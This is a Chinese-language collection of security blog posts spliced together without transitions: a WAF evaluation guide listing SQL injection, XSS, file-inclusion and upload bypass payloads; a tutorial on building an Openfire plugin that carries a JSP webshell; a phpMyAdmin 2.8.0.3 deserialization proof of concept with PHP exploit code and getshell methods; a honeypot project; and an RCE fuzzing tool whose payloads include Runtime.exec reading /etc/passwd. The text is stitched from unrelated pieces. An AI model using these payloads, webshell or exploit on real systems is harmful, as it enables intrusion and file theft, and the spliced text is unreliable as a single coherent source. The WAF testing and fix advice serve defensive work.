网络上很多同行都发文讨论过各种绕WAF的技巧，也有很多文章分享自研WAF的思路。

作为传统行业的甲方安全工程师，我试着写一写自己在WAF选型测试时的大体思路。

一方面，是对自己完成一个项目的总结，另一方面，也算是提供一个不同的视角看看WAF，希望对乙方朋友今后设计、优化WAF产品有一点点帮助。

0X01 测试思路

环境搭建

• 服务器：使用DVWA搭建一套包含各类漏洞的网站，并开启access日志以供分析。DVWA搭建过程不细说。
• WAF：反向代理部署，将DVWA服务器做反向代理后映射出VS IP。测试时所有payload发送至VS
  IP，经WAF处理后交给DVWA服务器。
• 测试方法：客户端构造payload提交给VS IP，服务器查看access日志。如被有效识别并过滤，access日志应没有相关内容。

0X02 OWASP TOP10 常规防御

SQLi

• get型注入：http://10.44.100.18/dvwa/vulnerabilities/sqli/?id=22&Submit=Submit#
  的参数id可以注入，构造payload提交即可。
• post型注入：DVWA登录过程用burpsuite抓包，即可构造post型注入。

XSS

• 反射型XSS和存储型XSS在DVWA中都有，构造payload即可。

CSRF、command injection、Brute Foce、File upload等等方式，DVWA都有了，不细说。

漏掉的是SSRF、反序列化、structs、心脏滴血，这些攻击在当前版本的DVWA中是没有设计的，需要单独考虑。

0X03 绕过技术的防御

除了最常见攻击手法的防御以外，WAF还应该具备识别变形的Payload的能力。

目前国内外商业WAF可以识别99%以上的常规攻击手段，区别主要就体现在对各类编码后的变形Payload的分析能力上。

这里面又区分成了两大类思路。

思路一：

WAF抓取到HTTP包后，做多重解码，将每重解码的结果提取正则，与特征库进行匹配。各家能解码的层数会有区别。F5的ASM可以支持最多5层并且允许用户手工设定层数。其他家虽不可指定解码层数，但都具备相应能力。

思路二：

考虑到正则匹配容易误报漏报，有厂家放弃了这种分析模式，转而做语义分析。长亭科技的SqlChop就是如此，详情可阅读：SQLChop - 一个新型 SQL 注入检测引擎

在测试中，需要手工对payload做编码变形。详细说来：

SQLi变形

• urlencode编码：别小看这种常见的绕过方法，有厂家的WAF还真检测不出来。
• unicode编码
• 关键字大小写替换：这个比较常规了，基本是没有检测不到的。
• 关键字转为十六进制
• 关键字用反引号引起来
• 关键字用/#! #/注释引起来
• 关键字用/##/注释截断：select转为sel/**/ect
• 关键字用%00截断
• 提交的HTTP包中，将x-originating-IP 改为127.0.0.1
• 提交的HTTP包中，将X-remote-addr 改为127.0.0.1
• SQLMAP的各类TAMPER，挨个试一试吧

XSS变形

XSS变形最多，WAF漏报也是最严重的。谁让HTML可利用的标签那么多呢。

这一块的测试，有赖于测试者平时收集各类XSS payload 的量。我仅列出一部分常见的以供参考：

<embed/src=//goo.gl/nlX0P>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<a onmouseover="javascript:window.onerror=alert;throw 1>
<svg><script>varmyvar="YourInput";</script></svg>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
<script>//@cc_on!alert(1)/*@cc_on~alert(2)@*/</script>
<marquee/onstart=confirm(2)>/
<a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>XSS

文件包含绕过

data:text/plain;base64,ZGF0YTp0ZXh0L3BsYWluLDw/cGhwIHN5c3RlbSgnY2F0IC92YXIvd3d3L0ZpbGVJbmNsdWRlLnBocCcpPz4=

文件上传绕过

文件上传绕过主要考虑几个方面：

• 123.php.123
• 123.asp;.gif
• as.php%00.gif
• 文件开头添加GIF89a
• burpsuite抓包修改Content-Type: image/jpeg

0X04 扫描器防御能力

WAF应具备根据数据包特征识别扫描器的能力，并加以阻止。常见的扫描器，如WVS、SQLMAP、Netsparker、havij、Appscan都应该拿来实际测试WAF的反应。

需要说明的一点是，WAF不仅要拦截扫描器发来的数据包，还应在日志中注明，攻击者使用何种扫描器。这对运维人员分析日志很有帮助。

例如，实际测试中，Imperva对SQLMAP和Netsparker都可以准确识别。而F5的ASM则可以准确识别WVS和SQLMAP。FortiWeb则不具备这个能力。

剩下几个章节，将讨论以下内容：

• Webshell通信拦截测试

0x01 环境：eclipse+openfire源码

源码地址：http://www.igniterealtime.org/downloads/source.jsp

最新版openfire安装方法可参考：http://www.51itong.net/openfire4-0-2-eclipse-19194.html

0x02 webshell插件生成方法

插件生成思路：将自己想使用的jsp马或者其他辅助jsp加入到已有的plugin->src->web目录下，然后biuld path，然后用ant打包成jar包，这样一个定制的傀儡插件就生成好了。

目前互联网上常见的的openfire版本大多为3.9.0或以上版本，为了兼容低版本，寻找存在插件时最好选支持低版本的插件，具体看plugin.xml中的minServerVersion，如下图：

找到合适的插件后，需要将自己要编译打包的jsp放到插件的src->web目录下，没有目录可以新建一个

然后选中插件，Build Path -> Use as Source Folder，然后修改源码build目录下的build.properties，下载的文件中这个多了个后缀，去掉后缀，然后如图修改（我选的插件叫broadcast，所以这里改成broadcast）:

然后右击build.xml 选择run as -> Ant Build (选择第二个)，然后在如图所示的位置打钩，这里只编译broadcast插件：

这样，一个插件jar包就生成好了，生成位置位于项目文件夹下的targetopenfireplugins下。

0x03 后台getShell

登陆到后台,上传插件，如图：

然后访问http://127.0.0.1/plugins/你的插件名/ma.jsp

编译好的插件：

plugins.zip

首发：http://www.mottoin.com/87915.html

前言

这个漏洞来源于路人甲在wooyun提交的漏洞

漏洞编号： WooYun-2016-199433

4月12日也曾在t00ls发表过，但是帖子关闭了

（详细漏洞文档可进群索取）

分析

存在漏洞的已知版本为 2.8.0.3 其余版本未知

本次测试的版本为2.8.0.3

看存在漏洞的文件代码

/scripts/setup.php

把传入的configuration给反序列化，而这个setup.php中引入了common.lib.php

来到common.lib.php

common.lib.php中引入了Config.class.php

再看看Config.class.php：

继续看load方法：

Config.class.php中含有__wakeup魔术方法，因此可以构造序列化参数，造成反序列化漏洞

所以整个思路就是：

setup.php->common.lib.php->Config.class.php->__wakeup()->load()->eval();

漏洞验证

构造个简单的poc：

url:

http://localhost/phpmyadmin/scripts/setup.php

post data:

configuration=O:10:”PMA_Config”:1:{s:6:”source”;s:11:”/etc/passwd”;}&action=test

mac下测试：

Win下：

提供一个PHP版PoC：

<?php
class PMA_Config
{
public $source;
}
$t = new PMA_Config();
$t -> source = $_GET['file'];
$str = serialize($t);
$url = $_GET['url'];
$data = "configuration=".$str."&action=test";
echo $data;
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_POST,true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,true);
echo curl_exec($ch); 
?>

Getshell

• 利用方式一

但是经过分析这个漏洞是不能读取php文件的，因为有了eval()，相当于任意文件包含了，不过另一方面这也是有好处的，如果能写入文件，文件中包含一个一句话就可以直接getshell了。作者给的方式是用error log。

根据作者的方法，使用默认环境，才发现有点鸡肋，比如，在ubuntu下，一般是不允许用root权限运行，实际测试中，我们是无法读取access.log的，所以getshell就比较困难。在windows下，由于几乎所有的浏览器和python模块都会很“自觉地”将特殊字符编码进行转换”，getshell就更困难了，所以只能用socket去构造shell。

Access log中就出现了shell了。

再用任意文件包含漏洞去包含，就可以拿到shell了。

• 利用方式二

PoC修改为如下：

通过FTP直接远程利用获取shell

前提是看file_get_contents可不可以远程（默认是开启的）

影响范围

• 存在漏洞的已知版本为 2.8.0.3 其余版本未知
• 许多内网的系统都在用这个版本，外网的也绝非少数！

修复建议

• 尽快升级到最新版
• 将setup.php中28行中的”configuration”改为传入其他值
• 直接删除scripts目录，防止被恶意攻击

项目主页

https://github.com/atiger77/Dionaea

简介

web_dionaea为企业内部web类蜜罐，用来捕捉APT，内鬼及被内鬼等入侵行为。项目使用Django编写，使用Docker运行方便部署。

注：项目前端部分由ID:chanyipiaomiao帮忙完成

部署方式

1. 自定义蜜罐名称；修改/web_dionaea/templates/index.html中的对应title
2. 制作蜜罐镜像；#docker build -t "web_dionaea" .
3. 创建蜜罐容器；#docker run -d -p 80:80 -v /opt:/tmp --restart=always web_dionaea
4. 添加计划任务；*/5 * * * * /bin/bash /opt/Check.sh

登录界面

日志截图

分析脚本执行结果

注意事项

这个dockerfile我没有直接构建push到dockerhub,可以任意修改成自己想要的样子，Check.sh脚本默认是在centos7环境下执行，修改Dionaea_HostIP值可直接兼容其他环境。有问题与我联系:d2VjaGF0OmF0aWdlcjc3

1. 背景

乌云还在的时候，猪猪侠爆一个XX银行的OGNL表达式注入漏洞，拿到了第一滴血。然后，唐朝实验室爆了个Spring-Boot的SPEL注入漏洞，虽然不是第一滴血，但是让我有了一个想法。因为看到过曾经黑帽大会有国外研究者写的一个很好的Paper：名字：us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf 里面提到了服务器端模板注入导致的远程命令执行类型漏洞产生。

1. 萌芽

我对远程命令执行漏洞的理解就是以各种方式直接或间接的导致远程服务器执行成功了你想要让它执行的系统命令的一类漏洞，英文叫：Remote Command Execute Vulnerability（简称RCE漏洞），这是一种很简单暴力的漏洞，一种一言不合就可以rm -rf /或者 format /fs C: 的致命漏洞。哪么都有些什么类型的命令执行漏洞，可以看看exploit-db上关于RCE漏洞的exp有哪些。点击查看

下面是我简单的归了一下类别，RCE漏洞包括但不限于下面提到的。

- 应用程序开发框架里的RCE

这里的框架包括但不仅限于：Struts2框架/xwork框架，ThinkPhp框架，Spring框架 ，IOSurface编程框架类

- 中间件平台/服务应用平台的RCE

这里的代表就举例之前火的JAVA反序列化漏洞影响下的：WebLogic/Jboss/WebSphere/Jenkins、还有比如IIS,nginx，apache因文件名解析，路径解析问题导致的命令执行类，还有Elasticsearch，Redis，Zabbix ，mongodb等各种为业务应用，为数据存储提供服务的软件的命令执行类。

- 应用程序里的RCE

应用程序编写中调用系统API接口，调用系统命令执行函数，程序中系统命令执行相关方法的不恰当使用等导致的一类。

- 第三方应用里的RCE

最喜闻乐见的就是各种CMS被曝SQL注入，命令执行漏洞，代码执行漏洞，这类CMS共同特点就是支持第三方插件，支持用户对原cms程序框架结构进行改造。当然还有之前火了的ImageImagick图形处理库的RCE，和 fffmep导致的RCE等等。

- 等等等

穷尽脑汁就想到了上面这些，有遗漏的典型分类还望大牛多多留言不吝赐教。

然后我好奇的上乌云搜了搜公开的漏洞里（PS: 打开虚拟机搜了搜）关键字：命令执行 的案例。

公开的有2373个案例，119页，我翻了很多页案例，其中以刷Struts2的S2-xxx的最多。命令执行漏洞案例里我看到了下面几类：

- OGNL表达式|程序代码注入导致的RCE

1.Struts2的S2-xxx系列，

2.参数里注入或直接传值OGNL表达式，

3.变量名里或参数里注入编程语言基本语法代码

- 系统命令注入|模板代码注入导致的RCE:

1.变量名里或参数里注入系统命令，

2.变量名里或参数里注入框架模板代码，

- 配置或业务设计不当导致的RCE

1.RMI对外匿名开放或服务未授权导致

2.文件解析执行绕过

3.缓存模板，日志记录，请求信息等被带入奇葩业务执行的

4.业务应用接口,系统接口等权限不当导致的

- 等等。。。

我的重点放在了参数中被带入了系统命令，程序代码，OGNL表达式，模板代码之类导致的RCE漏洞发生的情况。这类情况，有个共同点，大都是通过HTTP/HTTPS请求出现。之前，顺着之前流行的sqlmapapi的思路，我想是否可以同样实现一个， 你上着网就把漏洞给挖出来了呢？萌生了这个想法，于是就有了这么个小脚本。

1. 实现.

基于sqlmapapi的实现思路，同样用到了代理正常流量，提取Fuzzing点，带入测试payload进行Fuzzing测试。

实现环境：

• Python 2.7.8 ，Win8.1 x64

第三方模块（版本）：

• requests (2.9.1)、tornado (4.3)

先用Tornado实现代理正常上网，定义SSTIF_Fuzz类用于进行测试，SSTIF_Fuzz类里面定义了下面的函数：

1. _init_payloads_： 初始化各种测试payload的函数，里面现在已经具备了一些测试payload，包括通用的，PHP基础代码，JAVA语法的，OGNL表达式，EL表达式，SPEL表达式，Groovy测试payload，鸟哥爆的CA
   technologies存在远程命令执行漏洞poc.（暂时就这么多，会不断补充，除非证明此思路此脚本不可行。）
2. HttpHelper
   ：发出带有payload的构造好的请求，根据规则（响应数据包括字符串：10516*61501的结果：646744516，或者在自己配置的cloudeye里面手工确认）判定是否存在RCE漏洞。
3. Fuzzing_GET
   ：分析GET请求中的变量-值（key-value）组合，目前是对每一个value进行测试，未实现对key即变量名进行测试。
4. Fuzzing_HEADER：未实现，因为在乌云的案例中，发现有在Referer中，注入命令导致的RCE的案例，所以未来会考虑对这里的参数进行测试。
5. FileHelper：将测试可能存在RCE漏洞的记录在rce_success_result.txt文件里，格式例如：

   +==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==+
   +=+URL: http://202.111.222.333/index.jsp?id=1111&page=222&count=123
   +=+method: GET
   +=+param: id
   +=+payload: java.lang.Runtime.getRuntime().exec('cat</etc/passwd;$BASH')
   +==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==++==+

记录上面的一条，就可以比较清晰的看出要表达的意思了。

1. 使用.

1、安装第三方模块

pip install requests
pip install tornado

2、修改SSTIF_Fuzz类中配置文件：

大概在第49行：

self.my_cloudeye = “xxxx.dnslog.info” 这里配置为你的dnslog的域名地址。

3、然后找到一个没有使用的端口，命令：

python ssitf.py 8081 启用代理监听8081端口

4、和设置burpsuite一样，浏览器设置通过8081代理端口上网，然后后面就像使用Sqli半自动化工具那样安心上你的网吧。

注意：

ProxyHandler类中定义了黑名单请求后缀，域名黑名单，这是为了避免带来麻烦的，可以自己添加：大概在246-250行代码处：

url_ext_black = ['ico','flv','css','jpg','png','jpeg','gif','pdf','ss3','txt','rar','zip','avi','mp4','swf','wmi','exe','mpeg']
domain_black = ['gov.cn','gov.com','mil.cn','police.cn','127.0.0.1','localhost','doubleclick','cnzz.com','baidu.com','40017.cn','google-analytics.com','googlesyndication','gstatic.com','bing.com','google.com','sina.com','weibo.com']

1. 总结.

这个脚本做了什么：

• 从乌云上，从国外的研究者paper上拔下来了一些payload，作为fuzzing的依据。
• 实现了代理，从正常上网流量中提取GET和POST请求中的提取有效的参数作为Fuzzing测试点。
• 实现了个初级版本。

反思不足：

• payload是固定死的，这是一大弊端。
• 无法支持HTTPS流量的处理，这是技术盲点。
• Fuzzing太慢，目前是单线程的。
• Fuzzing情况考虑不全，应该是思路和认知盲点。
• 没有考虑狗，软硬防护产品的拦截绕过问题。

最后，看了很多案例，RCE其实就是插入那些东西进去，带入那些东西进去就可以简单初步判断是否存在该漏洞了，我感觉这是一种不错的思路，只是要实现自己的自动化挖掘漏洞神器还是长路漫漫~

Github地址：

SSTIF

欢迎测试，提出意见~

国外的一个自动化服务端模板注入检测和利用工具：https://github.com/epinna/tplmap http://www.mottoin.com/91727.html